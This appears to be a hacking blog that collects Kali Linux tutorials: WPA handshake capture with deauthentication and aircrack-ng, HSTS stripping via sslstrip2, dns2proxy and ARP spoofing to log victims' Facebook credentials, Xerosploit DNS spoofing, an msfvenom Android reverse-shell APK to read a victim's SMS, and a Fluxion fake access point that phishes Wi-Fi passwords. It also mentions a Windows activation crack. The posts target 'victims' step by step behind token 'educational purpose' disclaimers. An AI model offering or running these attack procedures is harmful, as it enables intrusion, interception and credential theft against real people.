First of all , fire up your kali linux then open up your terminal . For hacking wifi you must have proper wifi adapter on your device .
To check wifi adapter type command : sudo ifconfig
Then , after that allow monitor mode for your wifi device by typing command : sudo airmon-ng start wlan0 (wlan0 is your interface name)
Then , type command to check all the available wifi devices on your surrounding : sudo airodump-ng wlan0mon
Then after finding which device to start attack type command : sudo airodump-ng -c (this is channel number ) -w (this is name of wifi Essid ) --bssid wlan0mon
Then after typing this command you must capture the handshake . Then , for capturing handshake kickout everyone who are using the wifi by typing command : sudo aireplay-ng -0 0 -a (this is the bssid ) wlan0mon
Then , wait for a while and you will get handshake file .
Now , you will need a dictionary file for attack to start .Moreover, you can create dictionary file by help of crunch , CUPP or can download from web.
Now, we must start aircrack-ng by typing command : sudo aircrack-ng -w (now this is the location of dictionary file simply drag the file into terminal ) home@network.cap(this is the name of handshake file simply copy the name) press enter then the aircrack-ng will start it's work.
Note : This is only for educational purpose .For more depth video check my youtube video down below .
How to Bypass HSTS on google chrome ,safari ,firefox ?
HSTS( Http strict transport security )
Http strict transport securities are basically the securities mostly seen on websites like google , paypal , apple , facebook , twitter etc . These securities forces users to communicate with servers having HTTPS . These policies focus on passing all users through HTTPS intead of plain text HTTP.
Methods for bypassing HSTS using sslstrip2 , dns2proxy
Hopefully , we can bypass these hsts using tools sslstrip2 and dns2proxy .
Download sslstrip and dns2proxy first by entering command on terminal :
Then after downloading install sslstrip2 by first enter into sslstrip2 directory . Then for installation command : sudo python setup.py install
Then, open up root terminal . We must forward our ip address . For forwarding our ip address enter command : echo "1" > /proc/sys/net/ipv4/ip_forward
Then enter this command for flushing ip address : iptables --flush
Then after that enter this command : iptables --flush -t nat
Then we must redirect our ip address to port 9000 . So , for this enter command : iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
Then enter another command for redirecting on specific port : iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
Then this part is finished after this just open up another root terminal and go inside dns2proxy directory then run dns2proxy by command : python dns2proxy.py
Then open up another root terminal and run sslstrip on debug mode :sslstrip -l 9000 -a
Then check your default ip gateway by command : netstat -nr
Then check your interface by command : ifconfig
For running , arpspoof we need gateway ip address , victim ip address and interface in which we are currently working .
Run arpspoof by command : arpspoof -i wlan0 -t 192.168.1.2(victim ip address) 192.168.1.1 ( My gateway ip address )
Again , open up another root terminal and run command : arpspoof -i wlan0 -t 192.168.1.1(Now, gateway ip address at first ) 192.168.1.2( victims ip address )
After entering this command whenever victim starts to open up google chrome and goes through login on facebook then his all traffic will be automatically redirect to our http site then after victim enter his credentials the log will be saved in our folder .
Note : Only for educational purpose .
For more detail explanation check out my video walkthrough on this subject down below .
Xerosploit is efficient and advanced man in the middle attack framework developed by Lionsec . This framework is made up of tools such as : Driftnet,bettercap,ettercap,Nmap,sslstrip and are used to sniff the packets on internet . Hijack sessions , replace images , injecting html codes on browsers, injecting javascript codes on browsers, redirecting all webpages to the specified ip .
How to install Xerosploit ?
First of all , copy this url : https://github.com/LionSec/xerosploit
Then , open up your terminal and enter command : git clone https://github.com/LionSec/xerosploit
This will download necessary files from it's official website .Then,go to the xerosploit directory be entering command : cd xerosploit .
Then , enter command : sudo python install.py to install the necessary packages this may take about 5-10 minutes depending upon you internet speed.
After, that install terminal tables by entering command :pip install terminaltables and install tabulates by command :pip install tabulates .
Installation is completed.
How to run and use xerosploit ?
To run xerosploit simply enter command : sudo xerosploit .
After running press help for all necessary commands.
To start simply press scan this is simply a Nmap scan which scans all the devices that are connected too your network.
After scan is completed enter the ip address of victim or the device in which you want to test.
So , the next part is modules so again press help and see list of command which you can use .
If you want to use command dspoof(which is simply redirecting all websites into your ip address). First of all see you ip address by entering into new terminal command : sudo ifconfig . Then , you must have a html file created and name the html file index.html . After that you must trasfer this file to /var/www/html/ . If you are adminstrator then first of all enter this two commands : sudo chown -R $user:$user /var/www/html and sudo chmod -R 755 /var/www .This commands will give you necessary root access and you can simply copy that file to destination path.After that final command: sudo service apache2 start .Then , after completing all this step again return to original xerosploit terminal and enter your ip address.Then , this will redirect all victim webpage to your sample html file.
To , play with replace image command simply download one image to make victim frightened that his pc is really hacked and simply put that file location and the tool will do rest of work.
So , simply you can try other commands.
So, To know more about commands simply see my youtube video below .Thanks for visiting my blog .
Note : This tutorials are only for educational purpose don't by fool be hacking into other devices which is cyber crime .
How to Install Google Chrome on Kali linux 2.0 . .
Install Chrome on Kali linux Easy Method .
Open up iceweasel browser on your kali linux and download google chrome from their official site .After Downloading just goto download
folder and copy that file google chrome on Desktop and extract the .deb package by simply clicking extract here.
Then, open your terminal and list all the files by command :ls.
Then goto desktop folder by typing command:cd Desktop
And, list all the directories by command:ls
Now, go to google chrome directory by entering command:cd google-chrome-stable_current_amd64 .
Then list all files in that directory . There will be two files inside it "control.tar.gz" and "data.tar.xz" . Just , simply extract each files by command :tar -xf control.tar.gz & tar -xf data.tar.xz one at a time .
After they are extracted their will be two files created inside the above folder: etc and opt .
Now, we must simply transfer this files into their respective directory.so, first of all go inside the etc direcory then press command:
sudo mv cron.daily /etc/
Then , again goback by pressing command: cd .. then go inside opt directory by pressing command: cd opt .Then, their will be file called google, simply transfer this file by command : sudo mv google /opt/
after the files are moved to respective directory close the terminal .Then , goto search option in kali linux and search for main menu .
After that , open main menu and press on new item . Then in Name type google-chrome. In command browse for opt directory and go for google
folder we have just transfer open it and their will be file named google-chrome of 2.1 KB press that file .
Then for icon logo just press the square option in left side of new item and again goto opt directory and inside google and their
will be file called productlogo.jpg simply click their and press enter . Installation completed .
So, you can easily install google chrome on kali linux .Down below, i have also kept youtube link for video
.Hope you enjoyed it. .
Hacking android phones using simple msfvenom payload.
Firstly,fire up your kali linux and open your terminal .
After opening your terminal type command:msfvenom -p android/meterpreter/reverse_tcp set
LHOST=(ip address using sudo ifconfig if you are admin) set LPORT=4444 R>test.apk
Secondly, now you must simply transfer the apk into victim's mobile phone.(note this method works only for devices connected in same network
but,if you want to hack phone remotely than just port forward your ip address going into setting of your router .
Now, we must create metasploit session and create the listener.So, for doing that open another terminal and type command:
msfconsole.
After typing that command the metasploit firmware would be open then we must use multi handler exploit ;For that type command:
use exploit/multi/handler/ .
Then, multi handler gets open . Now , we must set payload for android and our meterpreter. So, type command:
set PAYLOAD android/meterpreter/reverse_tcp.
After setting up payload we must again setup lhost and lport so simply type command :set LHOST (Your ip address form
sudo ifconfig).
Then , again type command :set LPORT 4444.
Finally, hit command : exploit
So,if victim have installed the program on their mobile phone then you will get meterpreter session on your phone and type command:
help. By, entering that command you can see list of command that can be use on hacking phone .For example:sysinfo
(to check which system has installed and all android operating system infromation> check_root(to see if device is rooted or not),dump_sms(for
fetching all sms available on the device ) .
So, you can easily hack any android device using this method .Down below, i have also kept youtube link for video
.Hopeyou enjoyed it .
Note: Only for educational purpose guys . I won't be responsible for any harm on devices. Watch video if you did'nt understand the above process
Generally, if you have purchased the windows then there won't be problem for you but if you have downloaded windows
then there will be problem for your windows.So , this crack will help you for activation.
Hey , Guys Today i will be introducing hacking wifi with the help of kali linux .
Introduction on Fluxion
Fluxion is the tool developed by editing Linset which was previously used for penetesting wifi . Fluxion is Man In The Middle attack tool for any encryptions: WPA2,WPA-PSK,WEP.
First of all , Power up your machine then visit above link on your browser .
Then , download fluxion tool from the link extract the zip file .
After that open terminal on your device and list all folders command : ls
Then just go to directory fluxion by command : cd fluxion
Hence , after entering the fluxion again list all the folders inside it by command: ls
Then just type command : sudo ./Installer.sh enter password for your device.
This will take certain time depending on yours internet speed .
After installing , run fluxion using : sudo ./fluxion
After running select your specified network which to hack then after deauthenticate every network on your server using aircrack-ng mode . After kicking all of them you will get handshake required when they found out they have been kicked out they will again try to reconnect to the device .
After that using ssl certificate mode use web interface method then the fluxion tool create the fake wifi Access point disabling the victims access to their original wifi so open wifi would be open during this time . Therefore , when someone connect to device every detail of device would be shown .
Then when victim enters the browser and search for anything the fluxion tool create a fake webpage asking for password of wifi .
When vicitim enter password the password appears on the screen .
The video tutorial for this is given below please subscribe and like my youtube channel for more explained and deepth tutorial of kali linux .
Note : Only For Educational Purpose . Thanks for watching
